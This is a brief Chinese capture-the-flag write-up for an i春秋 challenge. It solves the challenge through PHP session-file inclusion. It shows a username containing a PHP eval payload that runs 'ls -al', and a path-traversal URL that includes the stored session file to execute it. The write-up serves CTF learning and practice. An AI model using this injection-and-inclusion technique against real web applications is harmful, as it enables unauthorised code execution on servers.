i春秋上百度杯十二月中的一道题目-看看我的Notebook

创建题目

深度截图_选择区域_20171219133537.png

具有注册和登录功能，随便注册一个登录发现：

深度截图_选择区域_20171219133649.png

得到线索there is no flag

根据题目标题以及提示得知该题目应该是session文件包含类型

之后在robots.txt发现php1nFo.php文件

http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=php&file=php1nFo

深度截图_选择区域_20171219134009.png

在phpinfo中发现session文件存放位置以及open_basedir

深度截图_选择区域_20171219134118.png
深度截图_选择区域_20171219134152.png

然后结合注册功能，注册一个特殊的用户名,例如：

<?php eval('echo `ls -al`;');?>

之后构造payload：

http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=txt&file=../../../tmp/SESS/sess_m9pfnnrf42eiirong93584f990

flag在注释中